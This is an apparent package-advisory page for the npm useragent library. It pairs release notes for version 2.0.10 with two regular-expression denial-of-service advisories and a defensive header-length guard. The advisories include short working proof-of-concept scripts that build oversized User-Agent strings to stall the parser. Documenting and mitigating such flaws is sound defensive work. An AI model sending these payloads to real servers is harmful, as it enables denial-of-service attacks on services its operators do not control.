Useragent, a popular npm package for parsing user agent strings, moved from version 2.0.9 to 2.0.10 in September 2014. Both versions share the same core functionality: accurate and efficient user agent parsing based on Browserscope's research, which makes the library useful for developers who need to identify browsers, operating systems, and device types from user agent strings.
Looking at the metadata, the key difference is the release date: version 2.0.10 was published roughly two and a half months after 2.0.9. The runtime and development dependencies are unchanged, which suggests that 2.0.10 contains bug fixes, performance improvements, or refinements to the browser detection database rather than new features. Because subtle changes in user agent patterns may only be parsed correctly with the latest detection data, developers should prefer the newest revision.
For developers evaluating useragent, the unchanged dependency list (lru-cache for caching, plus the mocha and should test tools) indicates continued support for caching and a maintained test suite, which helps keep the package performant and of consistent quality. The MIT license allows easy integration into projects of any kind. Given how quickly the browser landscape changes, staying on current versions matters for accurate results, so version 2.0.10 is a worthwhile update for user agent parsing in your applications.
All vulnerabilities affecting version 2.0.10 of the package
ReDoS via long UserAgent header in useragent
Affected versions of useragent are vulnerable to regular expression denial of service when an arbitrarily long User-Agent header is parsed.
```javascript
var useragent = require('useragent');
// Proof of concept from the advisory: an oversized header value that drives the
// parser's regular expressions into excessive backtracking.
var badUserAgent = 'MSIE 0.0' + Array(900000).join('0') + 'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
// Parsing the oversized input blocks the event loop for a long time.
console.log(useragent.parse(request));
```
Update to version 2.1.13 or later.
useragent Regular Expression Denial of Service vulnerability
Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).
```javascript
async function exploit() {
  const useragent = require("useragent");
  // Create a malicious user-agent that leads to excessive backtracking
  const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';
  // Parse the malicious user-agent
  const agent = useragent.parse(maliciousUserAgent);
  // Call the toString method to trigger the vulnerability
  // (toString is synchronous; the await simply keeps the advisory's shape)
  const result = await agent.device.toString();
  console.log(result);
}
// Top-level await is not available in a CommonJS script, so invoke the
// async function and surface any rejection instead.
exploit().catch(console.error);
```
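Both advisories above share one root cause: parsing cost grows superlinearly with the length of the User-Agent value. Besides upgrading, a defender can bound the header before any regex-based parser sees it. The following is an added example written for this page, not code from the useragent project; the byte limit, the slow-parse threshold and the stub parser are assumptions, and `useragent.parse` can be injected in place of the stub.

```javascript
// Added example, not useragent's own code: cap the User-Agent header before it
// reaches any regex-based parser. Backtracking cost grows with input length, so a
// byte limit bounds worst-case CPU even on a version that still carries the bug.
const MAX_UA_BYTES = 512;   // assumption: genuine browser UAs are far shorter
const SLOW_PARSE_MS = 50;   // assumption: flag parses slower than this for review

// Pure check, separated from the HTTP layer so it can be unit-tested directly.
function checkUserAgentHeader(value, maxBytes = MAX_UA_BYTES) {
  if (value === undefined) return { ok: true, reason: 'absent', bytes: 0 };
  if (typeof value !== 'string') return { ok: false, reason: 'not-a-string', bytes: 0 };
  const bytes = Buffer.byteLength(value, 'utf8');
  if (bytes > maxBytes) return { ok: false, reason: 'too-long', bytes };
  return { ok: true, reason: 'within-limit', bytes };
}

// Wrap any parser (e.g. useragent.parse). parseFn is injected so this file runs
// without the package installed; timing gives a detection signal for slow parses.
function guardedParse(parseFn, value, opts = {}) {
  const { maxBytes = MAX_UA_BYTES, slowMs = SLOW_PARSE_MS } = opts;
  const check = checkUserAgentHeader(value, maxBytes);
  if (!check.ok) return { rejected: true, reason: check.reason, agent: null, slow: false };
  const started = process.hrtime.bigint();
  const agent = parseFn(value === undefined ? '' : value);
  const elapsedMs = Number(process.hrtime.bigint() - started) / 1e6;
  return { rejected: false, reason: check.reason, agent, slow: elapsedMs > slowMs, elapsedMs };
}

// Plain Node http handler: oversized headers get 431 before any parsing happens.
function userAgentGuardHandler(parseFn, next, opts = {}) {
  return (req, res) => {
    const result = guardedParse(parseFn, req.headers['user-agent'], opts);
    if (result.rejected) {
      res.statusCode = 431; // Request Header Fields Too Large
      res.end('User-Agent rejected: ' + result.reason);
      return;
    }
    if (result.slow) console.warn('slow user-agent parse', result.elapsedMs, 'ms');
    req.agent = result.agent;
    next(req, res);
  };
}

// Stand-in parser and constructed inputs for a stand-alone run (not useragent).
const stubParse = (ua) => ({ family: ua.split('/')[0] || 'Other' });
const NORMAL_UA = 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/77.0';
const OVERSIZED_UA = 'Mozilla/5.0 (' + 'A'.repeat(100000) + ')';
```

Pass `userAgentGuardHandler(useragent.parse, yourHandler)` to `http.createServer` to apply the limit in front of the real parser; the slow-parse warning is the signal to watch for in logs.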